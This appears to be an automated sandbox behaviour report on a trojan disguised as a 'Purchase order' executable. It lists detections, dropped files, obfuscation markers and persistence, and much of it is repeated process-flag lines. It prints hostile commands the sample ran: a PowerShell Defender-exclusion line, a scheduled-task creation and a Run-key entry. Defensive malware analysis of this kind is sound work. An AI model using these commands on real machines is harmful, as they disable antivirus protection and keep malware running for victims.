                    Source: Purchase order 450080088 proj. Allt Charnan.exe | Virustotal: Detection: 37%
                    Source: Purchase order 450080088 proj. Allt Charnan.exe | ReversingLabs: Detection: 61%
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File read: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe "C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe"
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe "C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Process created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File created: C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File created: C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                    Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@23/16@12/3
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_01
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, Ej/rT.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: NpPgfycY.exe.0.dr, Ej/rT.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Purchase order 450080088 proj. Allt Charnan.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Purchase order 450080088 proj. Allt Charnan.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Purchase order 450080088 proj. Allt Charnan.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: SZArrayEnumera.pdb | source: jVULYR.exe, jVULYR.exe, 00000019.00000000.348771513.00000000009B2000.00000002.00000001.01000000.00000009.sdmp, jVULYR.exe, 0000001D.00000000.371444039.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, jVULYR.exe.9.dr, NpPgfycY.exe.0.dr

                    Data Obfuscation

                    Source: NpPgfycY.exe.0.dr, Ej/rT.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.3.unpack, Ej/rT.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.2.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: jVULYR.exe.9.dr, Ej/rT.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 0_2_02D48DEE pushad ; retf 0_2_02D48DEF
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 0_2_02D490DC pushad ; retf 0_2_02D490DD
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 0_2_07AA65E5 push edi; retf 0_2_07AA65E6
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 0_2_07AA4AD5 push edx; iretd 0_2_07AA4AD6
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_00FC2F10 push ss; retf 9_2_00FC2F3D
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B9A25 push ss; retf 9_2_064B9A27
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B072C push 0000001Ah; retf 9_2_064B072E
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B3330 push es; iretd 9_2_064B41D0
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B3330 push es; iretd 9_2_064B41E0
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B2C74 push 0000001Ah; retf 9_2_064B2C76
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064BDCE5 push 0000001Ah; retf 9_2_064BDCE7
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B18F6 push es; ret 9_2_064B1910
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B18AA push es; ret 9_2_064B18C4
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B18BD push es; ret 9_2_064B18C4
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B2177 push edi; retn 0000h 9_2_064B2179
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B1909 push es; ret 9_2_064B1910
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B41D9 push es; iretd 9_2_064B41E0
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B41D1 push es; iretd 9_2_064B41D8
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Code function: 9_2_064B15F7 push 0000001Ah; retf 9_2_064B15F9
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 20_2_01278DEE pushad ; retf 20_2_01278DEF
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 20_2_012790DC pushad ; retf 20_2_012790DD
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 20_2_05183F76 push edi; iretd 20_2_05183F77
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 20_2_08CD348D push edx; iretd 20_2_08CD348E
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 23_2_011AA64B pushad ; retf 23_2_011AA64C
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 23_2_011A8DEE pushad ; retf 23_2_011A8DEF
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 23_2_011A90DC pushad ; retf 23_2_011A90DD
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 23_2_011A981A pushfd ; iretd 23_2_011A981E
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 23_2_08D5348D push edx; iretd 23_2_08D5348E
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 25_2_05799990 push 0000001Ah; retf 25_2_05799992
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 25_2_0579985B push 0000001Ah; retf 25_2_05799866
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Code function: 25_2_06344B0B push ss; retf 25_2_06344B0D
                    Source: initial sample | Static PE information: section name: .text entropy: 7.75961172037
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File created: C:\Users\user\AppData\Roaming\NpPgfycY.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jVULYR

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | File opened: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe  Process information set: NOOPENFILEERRORBOX (52 identical entries)
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess information set: NOOPENFILEERRORBOX
